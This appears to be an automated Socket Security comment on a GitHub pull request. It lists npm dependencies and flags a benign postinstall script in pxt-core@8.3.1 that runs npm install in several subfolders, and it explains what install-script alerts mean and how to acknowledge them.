npm/rc@1.2.5, npm/readable-stream@2.3.3, npm/reduce-css-calc@1.3.0, npm/reduce-function-call@1.0.2, npm/request@2.83.0, npm/rimraf@2.5.4, npm/rtlcss@2.2.0, npm/safe-buffer@5.1.1, npm/semantic-ui-less@2.2.12, npm/semver@5.5.0, npm/serialport@4.0.7, npm/set-blocking@2.0.0, npm/signal-exit@3.0.2, npm/simple-get@1.4.3, npm/sntp@2.1.0, npm/sort-keys@1.1.2, npm/source-map@0.5.7, npm/sprintf-js@1.0.3, npm/sshpk@1.13.1, npm/strict-uri-encode@1.1.0, npm/string-width@1.0.2, npm/string_decoder@1.0.3, npm/stringstream@0.0.5, npm/strip-ansi@3.0.1, npm/strip-json-comments@2.0.1, npm/supports-color@3.2.3, npm/svgo@0.7.2, npm/tar-fs@1.16.0, npm/tar-stream@1.5.5, npm/tough-cookie@2.3.3, npm/tunnel-agent@0.6.0, npm/tweetnacl@0.14.5, npm/uniq@1.0.1, npm/uniqid@4.1.1, npm/uniqs@2.0.0, npm/unzip-response@1.0.2, npm/util-deprecate@1.0.2, npm/uuid@3.1.0, npm/vendors@1.0.1, npm/verror@1.10.0, npm/websocket-driver@0.7.0, npm/websocket-extensions@0.1.3, npm/whet.extend@0.9.9, npm/wide-align@1.1.2, npm/wrappy@1.0.2, npm/xtend@4.0.1

View full report↗︎

[socket-security]

🚨 Potential security issues detected. Learn more about Socket for GitHub ↗︎

To accept the risk, merge this PR and you will not be notified again.

Alert	Package	Note	Source
Install scripts	npm/pxt-core@8.3.1	Install script: postinstall Source: cd webapp && npm install && cd .. && cd skillmap && npm install && cd .. && cd authcode && npm install && cd .. && cd multiplayer && npm install && cd ..	package-lock.json package.json

View full report↗︎

Next steps

What is an install script?

Install scripts are run when the package is installed. The majority of malware in npm is hidden in install scripts.

Packages should not be running non-essential scripts during install and there are often solutions to problems people solve with install scripts that can be run at publish time instead.

Take a deeper look at the dependency

Take a moment to review the security alert above. Review the linked package source code to understand the potential risk. Ensure the package is not malicious before proceeding. If you're unsure how to proceed, reach out to your security team or ask the Socket team for help at support [AT] socket [DOT] dev.

Remove the package

If you happen to install a dependency that Socket reports as Known Malware you should immediately remove it and select a different dependency. For other alert types, you may may wish to investigate alternative packages or consider if there are other ways to mitigate the specific risk posed by the dependency.

Mark a package as acceptable risk

To ignore an alert, reply with a comment starting with @SocketSecurity ignore followed by a space separated list of ecosystem/package-name@version specifiers. e.g. @SocketSecurity ignore npm/foo@1.0.0 or ignore all packages with @SocketSecurity ignore-all

• @SocketSecurity ignore npm/pxt-core@8.3.1